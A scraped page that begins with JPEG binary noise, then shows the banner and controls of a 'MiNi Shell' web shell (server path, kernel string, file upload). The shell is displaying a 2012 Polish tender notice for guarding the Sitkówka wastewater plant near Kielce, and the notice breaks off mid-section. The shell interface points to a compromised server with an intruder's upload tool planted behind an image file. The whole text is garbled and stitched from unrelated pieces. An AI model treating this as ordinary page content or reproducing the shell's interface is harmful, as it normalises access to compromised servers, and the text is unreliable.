JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120112/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120112/11805-N-2012.html

<p class="kh_header"><b>Kielce: Ochrona obiektów na terenie oczyszczalni ścieków Sitkówka.</b><br>
<b>Numer ogłoszenia: 11805 - 2012; data zamieszczenia: 12.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wodociągi Kieleckie Sp. z o.o. , ul. Krakowska 64, 25-701 Kielce, woj. świętokrzyskie, tel. 041 3653100, faks 041 3455220.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wod-kiel.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Ochrona obiektów na terenie oczyszczalni ścieków Sitkówka..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest ochrona obiektów oczyszczalni ścieków SITKÓWKA k.Kielc, ul. Przemysłowa 32,26-051 Sitkówka.
Obszar dozorowania obejmuje:
- cały ogrodzony teren oczyszczalni ścieków zajmujący powierzchnię 27 ha wraz z obiektami i urządzeniami technologicznymi,
- paliwa i materiały do eksploatacji oczyszczalni - środki chemiczne w tym niebezpieczne: metanol, PIX, PAX,
- ogrodzenie terenu oczyszczalni o długości całkowitej 2 085 mb wraz z bramami i furtkami. 
W ogrodzeniu znajduje się 5 bram wjazdowych (3 bramy dwuskrzydłowe i 2 bramy przesuwne) 3 furtki,
- dwa szachty studzienne wraz z wyposażeniem  i ogrodzeniem terenu, znajdujące się w odległości ok. 80  m od głównego obiektu,
- teren przed wjazdem do stacji zlewczej,
- komora zasuw, budynek krat na kanale awaryjnym, znajdujące się w odległości ok. 90 m od głównego obiektu.

Zakres zamówienia obejmuje ochronę obiektów przed kradzieżą i dewastacją, poprzez:

- stały 24 godzinny bezpośredni dozór obiektów oczyszczalni ścieków, przez co najmniej 2 osoby z których jedna zobowiązana będzie do:

- ciągłego monitorowania terenu za pośrednictwem kamer przemysłowych ( 5 szt.),
- obsługi portierni w tym: wystawianie przepustek wraz z prowadzeniem rejestru godzin wejścia i wyjścia, prowadzenie rejestru i kontroli wjeżdżających i wyjeżdżających pojazdów na teren zakładu,
- otwieranie bram i szlabanu, obsługa domofonów.

- Druga osoba będzie realizowała usługę ochrony obiektów oczyszczalni poprzez obchody terenu nie rzadziej niż  co dwie godziny. 

- Pracownicy ochrony winni być wymieniani co dwa miesiące.

- W uzasadnionych przypadkach pracownicy ochrony winny posiłkować się patrolem interwencyjnym Firmy wykonującej usługę ochrony. 

- W przypadku stwierdzenia włamania, Wykonawca zobowiązany jest do  natychmiastowego powiadomienia o tym fakcie dyspozytora oczyszczalni.

- W przypadku stwierdzenia nieprawidłowego funkcjonowania jakiegokolwiek  elementu w systemie ochrony i braku możliwości usunięcia usterki, Wykonawca zobowiązany jest do zgłoszenia tego faktu do Zamawiającego w formie pisemnej. Awaria monitoringu nie zwalnia Wykonawcy z odpowiedzialności za ochraniane mienie.

- Wykonawca zobowiązany jest raz na kwartał  do bieżącej konserwacji n/w systemów, zainstalowanych na terenie oczyszczalni,

a) system telewizji przemysłowej, w zakresie:
- sprawdzenie funkcjonowania urządzeń transmisji sygnału wizyjnego,
- sprawdzenie uziemień ochronnych,
- sprawdzenie połączeń giętkich, 
- sprawdzenie zapisu obrazu,
- sprawdzenie sprawności działania całego systemu,
b) system sygnalizacji włamania w zakresie:
- sprawdzenie prawidłowego funkcjonowania wszystkich urządzeń wchodzących w skład instalacji alarmowej, w tym również czujników,
- sprawdzenie urządzeń transmisji alarmu,
- sprawdzenie i regulacja zasilacza akumulatorów,
- sprawdzenie stanu izolacji przewodów oraz przegląd puszek połączeniowych,
- sprawdzenie stanu połączeń giętkich,
- sprawdzenie układu przeciw sabotażowego poszczególnych urządzeń,
- sprawdzenie sprawności działania całego systemu poprzez wywołanie próbnego alarmu,
- czyszczenie czujników, czytników i klawiatur,
c) system kontroli dostępu w zakresie:
- sprawdzenie poprawności działania zasilaczy,
- pomiar napięć w tym napięcia rezerwowego,
- sprawdzenie stanu rygli,
- sprawdzenie stanu samozamykaczy drzwiowych  wraz z ewentualną regulacją.
d) system sygnalizacji p. poż. w zakresie:
- sprawdzenie prawidłowego funkcjonowania wszystkich urządzeń wchodzących w skład instalacji alarmowej, w tym również czujników  i ręcznych ostrzegaczy pożarów,
- sprawdzenie urządzeń transmisji alarmu,
- sprawdzenie i regulacja zasilacza akumulatorów,
- sprawdzenie stanu izolacji przewodów oraz przegląd puszek połączeniowych,
- sprawdzenie stanu połączeń giętkich,
- sprawdzenie sprawności działania całego systemu poprzez wywołanie próbnego alarmu,
- konserwacja czujników i centralek p. poż.

W przypadku stwierdzenia nieprawidłowego działania jakiegokolwiek elementu z ww. systemów i niemożności sunięcia usterki, Wykonawca zobowiązany jest do zgłoszenia tego faktu do Zamawiającego w formie pisemnej. 

Wszelkie naprawy wynikające ze stwierdzonych podczas przeglądów usterek, potwierdzonych pisemnym zgłoszeniem lub naprawy zlecone przez  Zamawiającego,  będą wykonywane na podstawie odrębnego zlecenia i rozliczane w oparciu o kosztorys sporządzony na podstawie bazy cenowej wynikającej z przyjętej oferty oraz kosztu użytych materiałów i części zamiennych.

Wykonawca winien zabezpieczyć pracowników ochrony w jednolite stroje robocze oznaczone  logo Firmy  oraz w środki łączności.

Wykonawca przy obsadzie personelu winien uwzględnić warunki pracy i zagrożenia występujące w  oczyszczalni ścieków. 

Przed złożeniem oferty Wykonawca zobowiązany jest do zapoznania się z występującymi na terenie oczyszczalni zagrożeniami. 
Informacje o występujących zagrożeniach  należy uzyskać w Dziale BHP, Kielce, ul. Krakowska 64, po uprzednim uzgodnieniu terminu z Panem Kazimierzem Kochańskim lub Panią Renatą Jaros,  telefon kontaktowy 41 365 31 46.

Warunkiem koniecznym, aby złożona oferta była ważna, jest załączenie do niej oryginału Zaświadczenia o zapoznaniu się z zagrożeniami występującymi w oczyszczalni ścieków - załącznik  nr 7 do niniejszego SIWZ, potwierdzonego przez służby BHP Zamawiającego. 


Brak tego dokumentu skutkować będzie odrzuceniem oferty.

Wykonawca zobowiązuje się do przestrzegania wszystkich przepisów BHP i p. poż obowiązujących w miejscu realizacji zamówienia. 

Wybrany Wykonawca będzie  zobowiązany do sporządzenia - Planu ochrony oczyszczalni ścieków SITKÓWKA. Sporządzony (Plan) nie  będzie wymagał uzgodnienia ze Świętokrzyskim Komendantem Wojewódzkim Policji w Kielcach. Nieprzekraczalny termin opracowania i przekazania do akceptacji Zamawiającego (Planu)to 3 miesiące od dnia podpisana umowy. Cena sporządzenia - Planów ochrony oczyszczalni ścieków SITKÓWKA- musi zawierać się w oferowanej cenie realizacji usługi.
Opracowanie winno być dokonane zgodnie z zasadami określonymi w Ustawie o ochronie osób  i mienia z dnia 22.08.1997  (tekst jednolity Dz. U. 2005 Nr 145 poz. 1221 z późniejszymi zmianami)  i dostarczone do Zamawiającego w wersji pisemnej w 2 egzemplarzach oraz  w wersji elektronicznej w formacie otwartym.

Zamawiający zaleca, aby przed złożeniem oferty, Wykonawca zapoznał się z przedmiotem zamówienia poprzez przeprowadzenie wizji lokalnej w terenie po uprzednim uzgodnieniu terminu, telefon kontaktowy 41 346 52 78 lub 41 346 53 24..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.70.00.00-1, 79.71.00.00-4, 79.71.30.00-5, 79.71.40.00-2, 79.71.50.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem udziału w przetargu jest wniesienie wadium w wysokości 3 000,00 PLN. Wadium  musi być wniesione przed upływem terminu składania ofert.

Wadium może być wnoszone w jednej lub kilku następujących formach:

-pieniądzu, 
-poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
-gwarancjach bankowych,
-gwarancjach ubezpieczeniowych, 
-poręczeniach udzielanych przez podmioty o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz. U. z 2007 Nr 42, poz. 275 z późniejszymi zmianami ). 

Wadium wnoszone w formie pieniężnej należy wpłacać przelewem na rachunek Spółki nr 79 1030 1162 0000 0000 0508 0201.	

Oferta nie zabezpieczona wymaganą kwotą wadium, zostanie odrzucona  bez rozpatrzenia.

W terminie składania ofert, kwota wadium musi znajdować się na rachunku Zamawiającego. W przypadku wniesienia wadium w innej formie niż pieniężnej, oryginał dokumentu gwarancyjnego musi być złożony w Biurze Obsługi Klienta Zamawiającego, 25-701 Kielce,  ul. Krakowska 64 przed upływem terminu składania ofert.

Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza.
Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy. 
Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.

Pozostałym Wykonawcom, Zamawiający zwróci wadium jeżeli: 

-upłynął termin związania ofertą,
-zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania tej umowy,
-zamawiający unieważnił postępowanie o udzielenie zamówienia, a odwołania zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.

Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3 nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust.1 lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.

Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
-odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych  w ofercie,
-nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
-zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest posiadanie koncesji na prowadzenie działalności w zakresie przedmiotu zamówienia, wydaną na podstawie ustawy z  dnia 22.08.1997 r. o ochronie osób i mienia ( tekst jednolity Dz. U. 2005 Nr 145 poz. 1221 z późniejszymi zmianami ). Koncesja  na prowadzenie działalności gospodarczej w zakresie ochrony osób i mienia powinna być aktualna w okresie realizacji zamówienia tj. do dnia 28.02.2013 r. W celu potwierdzenia tego warunku Zamawiający  żąda załączenia do oferty kopii Koncesji.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest , aby Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonywał świadczenia  w zakresie ochrony osób i mienia w co najmniej 4  przedsiębiorstwach, w których przedmiotem usługi są obiekty budowlane, budynki, maszyny i urządzenia.  W celu potwierdzenia tego warunku Zamawiający żąda złożenia oświadczenia o wykonanych lub wykonywanych usługach z podaniem nazw Odbiorców wraz z dokumentem potwierdzającym, iż usługa była lub jest wykonywana należycie - wzór Oświadczenia stanowi załącznik nr 4</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest , aby osoby uczestniczące w wykonywaniu zamówienia, posiadały wymagane licencje zgodnie z art. 25 ustawy o ochronie osób i mienia z dnia 22.08.1997  (tekst jednolity Dz. U. 2005 Nr 145 poz. 1221 z późniejszymi zmianami). W celu potwierdzenia tego warunku Zamawiający żąda złożenia oświadczenia, iż osoby które będą realizować przedmiot zamówienia posiadają wymagane prawem licencje, wzór oświadczenia stanowi załącznik  nr 5.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest, aby Wykonawca był ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż 1 000 000. zł. W celu potwierdzenia spełnienia tego warunku Zamawiający żąda załączenia kopii Polisy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zaświadczenie potwierdzające, iż Wykonawca zapoznał się z zagrożeniami występującymi na terenie oczyszczalni ścieków,  załącznik nr 7.

Jeżeli  dokumenty zostaną podpisane przez pełnomocnika, do oferty należy dołączyć prawnie skuteczne pełnomocnictwo. 

Pełnomocnictwo musi być złożone w formie oryginału lub kopii poświadczonej notarialnie.

Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy. Muszą oni ustanowić pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania w postępowaniu             i zawarcia umowy w sprawie zamówienia publicznego. Dokument potwierdzający ustanowienie pełnomocnika powinien zawierać:
-wskazanie postępowania którego dotyczy, 
-Wykonawców ubiegających się wspólnie o zamówienie,
-zakres umocowania pełnomocnika.
Winien on być podpisany przez wszystkich Wykonawców ubiegających się wspólnie                       o zamówienie publiczne. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze. Dokument pełnomocnictwa należy przedstawić w formie oryginału. Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem występującym jako pełnomocnik.
Warunki udziału w postępowaniu określone w punktach 3.1 i 3.4 musi spełniać każdy                       z Wykonawców osobno, natomiast warunki opisane w punktach 3.2 i 3.5 mogą być spełnione przez każdego z Wykonawców osobno lub mogą je spełniać wspólnie.  Warunki braku podstaw do wykluczenia musi spełniać każdy Wykonawca samodzielnie.
Jeżeli oferta Wykonawców występujących wspólnie zostanie wybrana, Zamawiający może zażądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>tak</p>
<ul class="kh_indent_1" style="text-align: justify;"><li>należy przedłożyć oświadczenie wykonawcy o zatrudnianiu ponad 50% osób niepełnosprawnych w rozumieniu przepisów o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych, lub w rozumieniu właściwych przepisów państw członkowskich Unii Europejskiej lub Europejskiego Obszaru Gospodarczego - jeżeli wykonawca ma siedzibę lub miejsce zamieszkania w tych państwach</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W trakcie realizacji zamówienia, Zamawiający dopuszcza  następujące zmiany w zapisie treści umowy: 
